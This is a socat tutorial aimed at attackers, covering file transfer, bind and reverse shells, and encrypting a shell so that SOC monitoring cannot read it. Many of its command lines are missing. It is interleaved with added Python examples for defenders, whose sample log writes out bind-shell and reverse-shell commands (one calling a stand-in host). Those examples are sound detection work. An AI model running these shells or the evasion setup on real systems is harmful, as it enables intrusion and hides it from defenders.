Socat
The abbreviation of the tool name is Socket Cat
SOCAT
Connection To a TCP/UDP Port
Attacker Machine
`-` : Stdin (socat's address for standard input/output)
Listening To a TCP/UDP Port
Victim Machine
Transfer File With Socat
Attacker Machine
`socat`: This is the command itself, which stands for "SOcket CAT". It is a multipurpose relay tool that creates two bidirectional byte streams and transfers data between them.
`TCP4`: This specifies the address type and protocol to be used. `TCP4` indicates that the connection uses TCP over IPv4.
`<IP>`: This is a placeholder for the IP address of the remote host to which you want to connect.
`<PORT>`: This is a placeholder for the port number on the remote host to which you want to connect.
`file:sec.txt`: This specifies the second address as a file. The data received from the TCP connection is written to (or read from) this file. Here, `sec.txt` is the filename.
`create`: This option ensures that the file `sec.txt` is created if it does not already exist. Without this option, the command fails if the file does not exist.
Victim Machine
`socat`: This is the command itself, which stands for "SOcket CAT". It is a utility for data transfer between two bidirectional data streams.
`TCP4-LISTEN:<PORT>`: This specifies that `socat` should listen for incoming TCP connections on the specified port (replace `<PORT>` with the actual port number you want to use).
`fork`: This option tells `socat` to fork (create a new process) for each incoming connection. This allows `socat` to handle multiple connections simultaneously.
`file:sec.txt`: This specifies that the data received from each connection should be written to the file `sec.txt`.
The advantage of Socat is that it allows more than one person to connect to the same port at the same time, and the connection is not separated, which is what distinguishes it from NC.
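What the `fork` option buys you on the listening side can be seen without socat at all. The following is an added example, not code from the original page: a small Python listener in the style of `TCP4-LISTEN:<PORT>,fork file:sec.txt` that handles every accepted connection in its own thread and appends what it receives to one file, so two senders can connect at the same time and neither blocks the other. The class and function names, the temporary file standing in for `sec.txt`, and the two sample payloads are all mine; only the standard library is used and everything stays on 127.0.0.1.

```python
import os
import socket
import socketserver
import tempfile
import threading


class AppendHandler(socketserver.StreamRequestHandler):
    """Per-connection handler: read until the client closes, then append to the shared file."""

    def handle(self):
        data = self.rfile.read()  # EOF arrives once the client shuts down its write side
        with self.server.file_lock:  # serialise writers so two appends cannot interleave
            with open(self.server.out_path, "ab") as fh:
                fh.write(data)
        self.server.finished.release()  # tell the caller this connection's bytes are on disk


class ForkLikeListener(socketserver.ThreadingTCPServer):
    """One thread per accepted connection: the threading analogue of socat's ',fork' option."""

    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, out_path):
        super().__init__(("127.0.0.1", 0), AppendHandler)  # port 0: the OS picks a free port
        self.out_path = out_path
        self.file_lock = threading.Lock()
        self.finished = threading.Semaphore(0)


def send_content(port, content):
    """Client side (the 'socat TCP4:<IP>:<PORT> ...' end): stream bytes, then half-close."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as sock:
        sock.sendall(content)
        sock.shutdown(socket.SHUT_WR)  # signals EOF to the listener, like the sender's file ending


def receive_from_concurrent_clients(payloads):
    """Start a listener, connect every client at once, return the bytes that reached the file."""
    fd, out_path = tempfile.mkstemp(suffix=".txt")  # hypothetical stand-in for sec.txt
    os.close(fd)
    server = ForkLikeListener(out_path)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    port = server.server_address[1]
    try:
        clients = [threading.Thread(target=send_content, args=(port, p)) for p in payloads]
        for c in clients:
            c.start()
        for c in clients:
            c.join()
        for _ in payloads:  # wait until every handler has appended its data
            if not server.finished.acquire(timeout=5):
                raise TimeoutError("a connection was never written to the file")
        with open(out_path, "rb") as fh:
            return fh.read()
    finally:
        server.shutdown()
        server.server_close()
        os.unlink(out_path)


if __name__ == "__main__":
    # Constructed sample: two clients send simultaneously, as two senders would against ',fork'.
    received = receive_from_concurrent_clients([b"first client: hello\n", b"second client: world\n"])
    print(received.decode())
```

Without the per-connection thread (a plain `socketserver.TCPServer`), the second client would have to wait for the first to finish, which is exactly the single-connection behaviour the text contrasts with socat's `fork`. The lock around the file write is what keeps two concurrent appends from interleaving inside one line.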
Using Standard Input | Output And Redirect
Victim Machine
`-` -> uses standard input; after this, socat waits for input
`<` -> the redirect character: sends the content of a file
Attacker Machine
`-` -> uses standard input; after this, socat waits for input
`>` -> the redirect character: stores the output in a file (overwrites it)
`>>` -> if you want to append content to a file, keeping the old value
Socat Bind
Attacker Machine
Victim Machine
`socat`: The command-line utility for bidirectional data transfer between two independent data channels.
`-d -d -d`: These flags enable different levels of debugging output. Each `-d` increases the verbosity of the debug information.
`tcp4-listen:<PORT>`: This option tells `socat` to listen for incoming TCP connections on the specified port (`<PORT>`). The `tcp4` part specifies that only IPv4 connections are accepted.
`fork`: This option tells `socat` to fork a new process for each incoming connection. This allows multiple clients to connect simultaneously, each handled by its own process.
`exec:/bin/bash`: This part of the command specifies that when a connection is established, `socat` should execute `/bin/bash`. This effectively provides a shell to the connected client.
Socat Reverse Shells
Attacker Machine
Victim Machine
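Both the bind shell explained above (`tcp4-listen:<PORT>,fork exec:/bin/bash`) and the reverse shell variant leave a very distinctive command line on the host, which is where a defender looks first. The following is an added example, not code from the original page: a Python classifier that parses socat invocations (for instance from a process-creation audit feed) into flags, addresses and options, and labels each one as bind shell, reverse shell, file transfer, interactive client or plain relay. The address keyword sets are socat's documented address names; the function names and the sample log lines are mine and constructed.

```python
import os
import shlex

# socat address keywords for sockets that wait for a peer vs. sockets that dial out.
LISTEN_KINDS = {"tcp-listen", "tcp-l", "tcp4-listen", "tcp4-l", "tcp6-listen", "tcp6-l",
                "udp-listen", "udp-l", "udp4-listen", "udp6-listen",
                "openssl-listen", "ssl-l", "sctp-listen"}
CONNECT_KINDS = {"tcp", "tcp4", "tcp6", "tcp-connect", "udp", "udp4", "udp6", "udp-connect",
                 "openssl", "openssl-connect", "ssl", "sctp"}
FILE_KINDS = {"file", "open", "create", "creat"}
# Program names that, handed to exec:/system:, mean a shell is attached to the socket.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "cmd.exe", "powershell.exe", "pwsh"}


def parse_socat(cmdline):
    """Split a socat command line into (flags, addresses); None if it is not socat."""
    argv = shlex.split(cmdline)
    if not argv or os.path.basename(argv[0]) != "socat":
        return None
    flags, addresses = [], []
    for arg in argv[1:]:
        if arg.startswith("-") and arg != "-":
            flags.append(arg)  # e.g. -d -d -d
            continue
        head, *options = arg.split(",")  # options such as fork, create, pty follow the address
        if head == "-" or head.upper() in {"STDIO", "STDIN", "STDOUT"}:
            addresses.append({"kind": "stdio", "target": "", "options": options})
        else:
            kind, _, target = head.partition(":")  # KIND:target, case-insensitive in socat
            addresses.append({"kind": kind.lower(), "target": target, "options": options})
    return flags, addresses


def classify_socat(cmdline):
    """Label one command line by what the two socat addresses are doing together."""
    try:
        parsed = parse_socat(cmdline)
    except ValueError:  # unbalanced quotes in the logged command line
        return "unparseable"
    if parsed is None:
        return "not-socat"
    _flags, addresses = parsed
    kinds = {a["kind"] for a in addresses}
    spawns_shell = any(
        a["kind"] in {"exec", "system"}
        and os.path.basename(a["target"].split()[0]) in SHELLS
        for a in addresses if a["target"]
    )
    if spawns_shell and kinds & LISTEN_KINDS:
        return "bind-shell"      # waits for a client, then hands it a shell
    if spawns_shell and kinds & CONNECT_KINDS:
        return "reverse-shell"   # dials out, then hands the peer a shell
    if kinds & FILE_KINDS:
        return "file-transfer"
    if "stdio" in kinds:
        return "interactive"     # operator's keyboard wired to a socket
    return "relay"               # socket to socket, e.g. a port forward


def scan_process_log(lines):
    """Return (label, line) for every command line that attaches a shell to a socket."""
    hits = []
    for line in lines:
        label = classify_socat(line)
        if label in {"bind-shell", "reverse-shell"}:
            hits.append((label, line))
    return hits


# Constructed sample of process command lines (as an EDR or auditd execve feed would record them).
SAMPLE_PROCESS_LOG = [
    "socat -d -d -d tcp4-listen:4444,fork exec:/bin/bash",   # the bind shell from the text
    "socat TCP4-LISTEN:8080,fork file:sec.txt,create",       # the file-transfer listener from the text
    "socat tcp4:192.0.2.10:4444 exec:/bin/bash",             # the reverse direction: target dials out
    "socat - TCP4:203.0.113.7:80",                           # interactive client: stdin to a port
    "socat TCP4-LISTEN:2222,fork TCP4:192.0.2.20:22",        # plain port forward / relay
    "nc -lvp 4444",                                          # not socat at all
]

if __name__ == "__main__":
    for label, line in scan_process_log(SAMPLE_PROCESS_LOG):
        print(f"{label:14s} {line}")
```

The split between "waits" and "dials out" is the same distinction the page's reverse-vs-bind table makes, so the two labels map directly onto the expected network behaviour (an unexpected listening port versus an unexpected outbound connection). Matching on the parsed address kind rather than on a substring avoids false hits on, say, a filename that happens to contain `exec`.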
Socat Encrypted Bind Shell
In normal use of the tool, anyone monitoring the communications, for example a SOC team watching everything that happens on the network, will see exactly what you are doing: the commands you run on the server or against victims inside the network, and everything else. You may be easily detected, and the observer will know exactly what you did.
Let's see this using Wireshark:
Here I use a filter to show only the TCP packets, because you will find a lot of connections using several different protocols, which is normal within a network.
--
As you can see, as soon as the `ls` command was typed, the packets and connections started to appear.
--
If you notice some strange letters, it is because they are related to the colours shown in the terminal. Some of them are terminal formatting, such as a line break to display the rest of the files, or the colour of a file name and the colour of the folders.
As you can see, this behaviour is very clear to anyone monitoring what happens on the network.
--
To hide this, we will encrypt the packets and all communication between us and the other device, using an encryption key that we will create.
Generate key.pem
`req` ⇒ Indicates that we want to use OpenSSL in request mode, which is used to create or process certificate signing requests.
`-x509` ⇒ Indicates that we want to create a self-signed X.509 certificate, the common format for digital certificates, rather than a signing request.
`-newkey rsa:4096` ⇒ Tells OpenSSL to generate a new RSA key pair with a length of 4096 bits. The private and public key are generated in this step.
`-keyout` ⇒ Specifies the name of the file in which the private key will be saved. In this case, the private key will be saved in a file called `key.pem`.
`-out` ⇒ Specifies the name of the file in which the public certificate will be saved. In this case, the public certificate will be saved in a file called `cert.pem`.
`-days` ⇒ Determines the validity period of the certificate after its issuance; here it is set to one year (365 days).
--
Attacker
Victim
Wireshark
Data is Encrypted Using openssl
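The two Wireshark views above, the cleartext session with its "strange letters" and the TLS-wrapped session afterwards, can also be told apart programmatically. The following is an added example, not code from the original page: Python that labels each TCP payload of a stream as a TLS record, colour-coded terminal output, other cleartext or binary, using the TLS record-header layout and the ANSI escape sequences that produce those strange letters. The payloads are constructed samples rather than a real capture, and the function names are mine.

```python
import re

# CSI escape sequences such as ESC[01;34m (colour) or ESC[K (clear to end of line) that a
# colour-aware `ls` emits; on the wire they are the "strange letters" Wireshark shows.
ANSI_CSI = re.compile(rb"\x1b\[[0-9;?]*[ -/]*[@-~]")

# A TLS record starts with its content type, then the legacy version 0x03 0x0x, then a length.
TLS_CONTENT_TYPES = {0x14: "change_cipher_spec", 0x15: "alert", 0x16: "handshake", 0x17: "application_data"}
MAX_TLS_RECORD = 16384 + 2048  # TLSPlaintext limit plus the allowance for MAC/padding expansion


def looks_like_tls_record(payload: bytes) -> bool:
    """Heuristic: does this TCP segment begin with a plausible TLS record header?"""
    if len(payload) < 5:
        return False
    content_type, major, minor = payload[0], payload[1], payload[2]
    length = int.from_bytes(payload[3:5], "big")
    return (content_type in TLS_CONTENT_TYPES and major == 3 and minor <= 4
            and 0 < length <= MAX_TLS_RECORD)


def classify_segment(payload: bytes) -> str:
    """Label one TCP payload: 'tls', 'cleartext-terminal', 'cleartext' or 'binary'."""
    if looks_like_tls_record(payload):
        return "tls"
    if ANSI_CSI.search(payload):
        return "cleartext-terminal"  # readable shell output, colours and cursor control included
    if not payload:
        return "binary"
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in payload) / len(payload)
    return "cleartext" if printable >= 0.9 else "binary"


def summarize_stream(segments) -> dict:
    """Count how many segments of a TCP stream fall under each label."""
    counts = {}
    for segment in segments:
        label = classify_segment(segment)
        counts[label] = counts.get(label, 0) + 1
    return counts


def readable_shell_traffic(segments) -> bool:
    """True when at least one segment carries terminal control sequences in the clear."""
    return summarize_stream(segments).get("cleartext-terminal", 0) > 0


# Constructed sample payloads modelled on the two Wireshark views above; not a real capture.
PLAIN_SHELL_STREAM = [
    b"ls\n",                                                                 # the command typed
    b"\x1b[0m\x1b[01;34mDocuments\x1b[0m  \x1b[01;32mbackup.sh\x1b[0m  notes.txt\r\n",  # coloured output
    b"$ ",                                                                   # the prompt
]
TLS_SHELL_STREAM = [
    b"\x16\x03\x01\x00\x10" + bytes(16),         # handshake record header followed by a body
    b"\x17\x03\x03\x00\x20" + bytes(range(32)),  # application data: the same session, now opaque
]

if __name__ == "__main__":
    for name, stream in (("plain", PLAIN_SHELL_STREAM), ("tls", TLS_SHELL_STREAM)):
        print(name, summarize_stream(stream), "readable shell:", readable_shell_traffic(stream))
```

The record-header check is deliberately loose: it tells you only that the channel is TLS, not what runs inside it, which is why a detection engineer pairs this network-side signal with the host-side one (a listening socket or an outbound connection owned by a process that spawned `/bin/bash`). Note that the cleartext-terminal label fires on the escape sequences themselves, so a session with colours disabled would only ever reach "cleartext" and needs the printable-ratio fallback.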
Socat VS Netcat
Summary Table
Feature | Netcat (nc) | Socat |
---|---|---|
Protocol Support | TCP, UDP | TCP, UDP, SCTP, UNIX sockets, and more |
Ease of Use | Simple, easy to use | More complex, steeper learning curve |
Functionality | Basic networking tasks | Advanced networking capabilities |
Port Scanning | Yes | No |
Data Transformation | No | Yes |
Proxying/Relaying | Basic | Advanced |
Debugging | Basic | Detailed |
File Transfer | Yes | Yes |
Conclusion
Use `netcat` for simpler, quick networking tasks such as port scanning, basic data transfer, and simple shell setups.
Use `socat` when you need advanced capabilities such as data transformation, complex proxying, and handling multiple types of sockets and protocols.
Choose the tool based on the complexity of the task and the level of control you need over the network connections and data streams.
Reverse shell VS Bind
Summary Table
Feature | Reverse Shell | Bind Shell |
---|---|---|
Connection Initiator | Target | Attacker |
Firewall/NAT Evasion | Easier | Harder |
Setup Complexity | More complex on target side | Simpler on target side |
Detection Risk | Moderate (outbound connection) | Higher (listening port) |
Use Case | When outbound connections are allowed | When the attacker can’t receive connections |
Conclusion
Reverse Shell is generally more flexible in bypassing network restrictions.
Bind Shell can be simpler but is more likely to be blocked by network defenses.
Choose the method based on the network environment and specific constraints you are working with. Always ensure you have authorization and understand the legal implications of using these techniques.